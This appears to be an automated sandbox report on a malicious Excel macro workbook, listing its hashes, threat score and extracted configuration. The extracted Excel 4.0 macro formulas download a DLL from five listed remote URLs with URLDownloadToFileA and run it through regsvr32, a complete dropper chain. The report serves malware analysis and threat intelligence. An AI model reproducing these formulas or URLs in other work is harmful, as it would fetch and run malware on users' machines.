Overview

overview

10

Static

static

10

6d3ff1a07f...3.xlsm

windows7-x64

10

6d3ff1a07f...3.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    6d3ff1a07fd10f53b41fd2c1eb20ae1b5f081d1c0bcc1f6b1d362ae77dd3ee23

  • Size

    31KB

  • Sample

    241120-1tmb3aterg

  • MD5

    7bb6618455c59936ad9945ac96935fa0

  • SHA1

    84c78c2826a4e4c134cbf496c35fd8695901412e

  • SHA256

    6d3ff1a07fd10f53b41fd2c1eb20ae1b5f081d1c0bcc1f6b1d362ae77dd3ee23

  • SHA512

    0239823aea0a390d21693d97511ccd7325584a1919c57a94b35a07b62fea970a5f99e9f65d53689520fdba3f9d95a18bee097434d98a027b322aeb28a349cdc1

  • SSDEEP

    384:dupPr/nHYzzaivuTc4OVdgzq7apRI6ZIwDyWS4UyRMCYMVM7btUMLW7joHqgmJyL:gqt2/OXWT+43SaMdbLWAy+IS

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://jetanahtarcilingir.net/wp-admin/dNZqOigWx5XCnSlZ/

http://formulationdrugstore.com/wp-includes/UTDuP5ti/

https://brutobrasil.com.br/pdf/LubLsUkjN/

http://flexaviationcenter.com/bin/mvd4h6/

http://flumedya.com/assets/zahEwukU/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://jetanahtarcilingir.net/wp-admin/dNZqOigWx5XCnSlZ/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://jetanahtarcilingir.net/wp-admin/dNZqOigWx5XCnSlZ/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://formulationdrugstore.com/wp-includes/UTDuP5ti/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://brutobrasil.com.br/pdf/LubLsUkjN/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://flexaviationcenter.com/bin/mvd4h6/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://flumedya.com/assets/zahEwukU/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://jetanahtarcilingir.net/wp-admin/dNZqOigWx5XCnSlZ/
xlm40.dropper

http://formulationdrugstore.com/wp-includes/UTDuP5ti/
xlm40.dropper

https://brutobrasil.com.br/pdf/LubLsUkjN/
xlm40.dropper

http://flexaviationcenter.com/bin/mvd4h6/
xlm40.dropper

http://flumedya.com/assets/zahEwukU/

Targets

    • Target

      6d3ff1a07fd10f53b41fd2c1eb20ae1b5f081d1c0bcc1f6b1d362ae77dd3ee23

    • Size

      31KB

    • MD5

      7bb6618455c59936ad9945ac96935fa0

    • SHA1

      84c78c2826a4e4c134cbf496c35fd8695901412e

    • SHA256

      6d3ff1a07fd10f53b41fd2c1eb20ae1b5f081d1c0bcc1f6b1d362ae77dd3ee23

    • SHA512

      0239823aea0a390d21693d97511ccd7325584a1919c57a94b35a07b62fea970a5f99e9f65d53689520fdba3f9d95a18bee097434d98a027b322aeb28a349cdc1

    • SSDEEP

      384:dupPr/nHYzzaivuTc4OVdgzq7apRI6ZIwDyWS4UyRMCYMVM7btUMLW7joHqgmJyL:gqt2/OXWT+43SaMdbLWAy+IS

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks